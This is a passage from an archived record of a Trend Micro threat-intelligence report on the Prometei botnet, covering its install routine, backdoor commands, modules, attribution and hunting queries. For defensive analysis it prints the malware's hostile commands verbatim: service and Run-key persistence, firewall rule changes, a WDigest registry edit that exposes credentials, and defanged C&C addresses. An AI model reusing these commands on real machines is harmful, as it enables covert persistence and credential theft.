will\r\ncontain the value names MachineKeyId, EncryptedMachineKeyId, and CommId, for later use by the\r\ndifferent components for C\u0026C communication.\r\nCheck the contents of the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Fax\\\r\nvalue CommId.\r\nIf the value contained is not null, the botnet would use this registry key instead of the newly\r\ncreated one to store the previously mentioned value names.\r\nCheck if it is executed with a parameter (This will be used to know if the binary is performing\r\ninstallation or its main botnet routines). The parameter that will be used later is “Dcomsvc”\r\nHere is a summary of the executed commands it will perform for its installation:\r\nCopy Self to C:\\Windows\r\nC:\\Windows\\System32\\cmd.exe /C copy /y \"{Malware Folder}\\zsvc.exe\" C:\\windows\r\nDelete Exisiting UPlugPlay Service and a Create UPlugPlay Service\r\nC:\\Windows\\System32\\cmd.exe /C sc delete UPlugPlay\u0026sc create UPlugPlay\r\nbinPath= \"c:\\windows\\sqhost.exe Dcomsvc\" type= own DisplayName= \"UPlug-and-Play Host\" start= auto error= ignore\r\nC:\\Windows\\System32\\cmd.exe /C sc config UPlugPlay start= auto\r\nC:\\Windows\\System32\\cmd.exe /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay\"\r\n/v ImagePath /f /t REG_EXPAND_SZ /d \"c:\\windows\\sqhost.exe Dcomsvc\"\r\nRename Self to sqhost.exe\r\nC:\\Windows\\System32\\cmd.exe /C ren C:\\windows\\zsvc.exe sqhost.exe\r\nStart UPlugPlay Service\r\nC:\\Windows\\System32\\cmd.exe cmd.exe /C sc start UPlugPlay\r\nCreate a firewall rule that will allow sqhost.exe to create connections over HTTP\r\nC:\\Windows\\System32\\cmd.exe /C netsh advfirewall firewall add rule name=\"Secure\r\nSocket Tunneling Protocol (HTTP)\" dir=in action=allow\r\nprogram=\"c:\\windows\\sqhost.exe\" enable=yes\u0026netsh firewall add allowedprogram\r\nc:\\windows\\sqhost.exe \"Secure Socket Tunneling Protocol (HTTP)\" ENABLE\r\nIf installing itself without admin rights, it will instead do the following:\r\nQuery the service UPlugPlay\r\nCopy self and rename as sqhost to %AppData%\\intel\\roaming folder:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C copy /y \"{Malware Folder}\\zsvc.exe\"\r\n\"%AppData%\\intel\\sqhost.exe\"\r\nAdd itself to the current user CurrentVersion\\Run autostart key for persistence.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C reg add\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UPlugPlay /t REG_SZ /d\r\n\"c:\\users\\dyituser_764\\appdata\\roaming\\intel\\sqhost.exe Dcomsvc\" /f\r\nExecute its copied self with the “Dcomsvc” parameter.\r\nIf it is finished with its installation routines it will proceed to terminate itself.\r\nsqhost.exe (As the main botnet binary)\r\nSince sqhost and zsvc are the same file, they also have the same way of packing (initially upx, then the custom\r\nunpacker).\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 14 of 18\n\nThe sample can check if it is run with a parameter. Some parameters it checks for include: ver, Dcomsvc, sha1chk\r\n{input}, and watchdog. Based on testing running the parameters don’t return a console output\r\nThe service created executes the sample with the parameter “Dcomsvc”\r\nThe sample appears to be version 3.22 of the botnet.\r\nExecution chain\r\nThe sample will execute itself with the watchdog parameter. The watchdog ensures that only one instance of\r\nthe service is running.\r\nThe sample will then then execute the command:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C netsh advfirewall firewall delete rule name=\"Banned brute IPs\"\r\n\"C:\\Windows\\System32\\cmd.exe\" /C Auditpol /set /subcategory:\"Logon\" /failure:enable\r\nThe sample will attempt to execute its downloaded modules:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C rdpcIip.exe\r\n\"C:\\Windows\\System32\\cmd.exe\" /C netsync_v2.exe\r\n\"C:\\Windows\\System32\\cmd.exe\" /C nvstub_v2.exe\r\n\"C:\\Windows\\System32\\cmd.exe\" /C netdefender.exe\r\nThe sample will perform reconnaissance commands:\r\nwmic baseboard get Manufacturer\r\nwmic baseboard get product\r\nwmic ComputerSystem get Model\r\ncmd.exe /c ver\r\nwmic OS get lastbootuptime\r\nwmic os get caption\r\nThe sample will begin attempts to connect to its C\u0026C.\r\nIf the connection is successful, the sample will now await commands.\r\nThere are four possible C\u0026C found hardcoded in the binary where the bot can obtain its configuration:\r\nhttp[://]p2.feefreepool[.]net/cgi-bin/prometei.cgi\r\nhttp[://]mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq[.]zero/cgi-bin/prometei.cgi\r\nhttp[://]mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq[.]b32[.]i2p/cgi-bin/prometei.cgi\r\nhttps[://]gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi\r\nIdentified backdoor commands from the sample:\r\nCommands Description\r\nset_cc1 Sets a C\u0026C server\r\nset_cc0 Sets a C\u0026C server\r\nset_autoexec2 Sets an automatic execution\r\nset_autoexec1 Sets an automatic execution\r\nset_timeout Sets a period for connecting to the C\u0026C server\r\nstart_mining Launches SearchIndexer.exe\r\nstart_mining1 Launches SearchIndexer.exe\r\nstop_mining Terminates SearchIndexer.exe\r\nquit Terminates the bot\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 15 of 18\n\nquit2 Terminates the bot\r\nsysinfo Collects information about the machine\r\ncall Executes a program or a file\r\nwget Downloads a file\r\nxwget Downloads a file, saves it, and uses XOR to decrypt it\r\nexec Executes a command\r\nupdate Updates the bot version\r\ntouch Opens a file\r\nchkport Checks if a specific port is open\r\nextip Returns the bot's external IP address\r\nsearch Searches for files by name\r\nfchk Checks if a file is locked by a process and the file’s owner\r\nfdir Gets current directory\r\nTable 1. Backdoor commands from the sample\r\nInformation Stolen\r\nThe sample can execute reconnaissance commands to collect details about the system and motherboard.\r\nThanks to its versatile backdoor commands, the bot is capable of gathering various types of information.\r\nrdpclIp.exe\\winhlpx64.exe\r\nThe botnet’s main spreader module\r\nExecuted by the main bot sqhost.exe\r\nExecutes the command \"C:\\Windows\\System32\\cmd.exe\" /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" /v\r\nUseLogonCredential /f /t REG_DWORD /d 1 to enable its password stealing module to harvest credentials.\r\nmiwalk.exe\r\nThe botnet’s customized Mimikatz module\r\nExecuted by rdpclIp.exe. It works in tandem with its parent process to gather stolen credentials that can be used for\r\nlateral movement.\r\nThe gathered credentials are stored in C:\\Windows\\dell\\slldata2.dll.\r\nwindrlver.exe\r\nThe botnet’s SSH spreader module\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 16 of 18\n\nIt is executed by rdpclIp.exe.\r\nIt must be executed with the correct parameters as determined by rdclIp.exe.\r\nSearchIndexer.exe\r\nThe botnet’s mining payload\r\nUses XMRig version 6.18.0\r\nWill be executed by sqhost.exe when the bot receives the commands “start_mining” or “start_mining1”\r\nFigure 20. Code snippet showing the commands for the mining payload\r\nIdentifying the Threat Group\r\nThe threat actors behind Prometei remain largely unidentified, but evidence suggests they are Russian-speaking individuals.\r\nThe name \"Prometei,\" derived from the Russian translation for Prometheus, hints at a cultural connection.\r\nOlder versions of the malware dating back to 2016 contained remnants of Russian language settings, such as an unedited\r\n\"product name\" in the main bot module and a language code indicating Russian.\r\nFurthermore, Prometei appears to avoid infecting other Russian speakers, as observed in the behavior of some of its\r\nmodules. One of these notable features is the integration with a Tor client, which facilitates communication with a Tor C\u0026C\r\nserver while avoiding certain exit nodes in the former Soviet Union. Additionally, another component, nvsync.exe, checks\r\nfor stolen credentials and deliberately avoids targeting accounts labeled “Guest” and “Other user” (in Russian), further\r\nsuggesting a focus on specific targets.\r\nConclusion\r\nOur investigation into the Prometei attack reveals the botnet's complexity and persistence in compromised environments.\r\nUtilizing WMI and lateral movement tactics, Prometei rapidly spreads by exploiting SMB and RDP vulnerabilities. Key\r\ncomponents like sqhost.exe and miwalk.exe facilitate credential harvesting and connections to command-and-control\r\nservers. The presence of encoded payloads, Base64-obfuscated PowerShell commands, and firewall modifications\r\nunderscores the attackers’ efforts to evade detection and maintain persistence.\r\nIncorporating MXDR services into our investigation enhanced real-time monitoring and event correlation, boosting the\r\nability to detect and respond to malicious activities early in the attack lifecycle. By combining Incident Response, Threat\r\nIntelligence, and MXDR, we gained a comprehensive understanding of the Prometei botnet and its potential impact on the\r\ncompromised network. This investigation highlights the importance of proactive detection and response, showing how the\r\nright solutions and intelligence (as facilitated by Trend Vision Oneone-platform) can reduce dwell time and protect against\r\nadvanced threats.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights\r\nwithin Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better\r\nprepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the\r\ntechniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments,\r\nmitigate risks, and respond effectively to threats. \r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nUnmasking Prometei: A Deep Dive Into Our MXDR Findings\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 17 of 18\n\nTrend Micro Vision One Threat Insights App\r\nEmerging Threats: Unmasking Prometei: A Deep Dive Into Our MXDR Findings\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog\r\npost with data in their environment.    \r\nDetection of PROMETEI Malware \r\nmalName:* PROMETEI* AND eventName:MALWARE_DETECTION \r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabledproducts\r\nIndicators of Compromise\r\nThe full list of IOCs can be found here\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 18 of 18\n\nmiWalk64.exe miWalk32.exe   \nFigure 5. 7z.exe file used to extract contents of updates1.7z and updates2.7z\n  Page 3 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html"
	],
	"report_names": [
		"unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434871,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/127d85bb2f93bc1c23c229f18e99518932c70640.pdf",
		"text": "https://archive.orkl.eu/127d85bb2f93bc1c23c229f18e99518932c70640.txt",
		"img": "https://archive.orkl.eu/127d85bb2f93bc1c23c229f18e99518932c70640.jpg"
	}
}